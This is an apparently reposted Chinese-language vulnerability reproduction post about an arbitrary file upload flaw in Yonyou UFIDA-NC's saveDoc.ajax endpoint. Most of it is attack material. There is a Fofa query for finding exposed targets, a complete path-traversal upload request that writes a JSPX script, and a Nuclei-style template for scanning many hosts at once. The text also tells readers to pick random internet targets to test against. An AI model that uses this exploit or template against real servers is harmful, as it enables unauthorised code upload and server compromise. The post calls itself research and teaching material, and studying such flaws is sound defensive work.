漏洞简介
用友-UFIDA-NC 存在任意文件上传漏洞.
漏洞复现
步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....
# Fofa搜索语法title="产品登录界面"
步骤二:启代理并打开BP对其首页进行抓包拦截....修改请求头内..
POST /uapws/saveDoc.ajax?ws=/../../test1.jspx%00 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Content-Type: application/x-www-form-urlencodedcontent=<hi xmlns:hi="http://java.sun.com/JSP/Page"><hi:directive.page import="java.util.*,java.io.*,java.net.*"/><hi:scriptlet>out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete();</hi:scriptlet></hi>
访问上传文件
http://127.0.0.1/uapws/test1.jspx
批量脚本
id: yonyou-UFIDA-NC-saveDoc-ajax-uploadfileinfo:name: 用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!: lyseverity: highmetadata:: title="产品登录界面"variables:filename: "{{to_lower(rand_base(5))}}"boundary: "{{to_lower(rand_base(20))}}"http:raw:|POST /uapws/saveDoc.ajax?ws=/../../{{filename}}.jspx%00 HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0: application/x-www-form-urlencodedcontent=<hi xmlns:hi="http://java.sun.com/JSP/Page">:directive.page import="java.util.*,java.io.*,java.net.*"/>:scriptlet>World!");new java.io.File(application.getRealPath(request.getServletPath())).delete();:scriptlet></hi>|GET /uapws/{{filename}}.jspx HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0matchers:type: dsldsl:status_code==200 && contains_all(body,"Hello World!")
原文始发于微信公众号(揽月安全团队):用友-UFIDA-NC 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论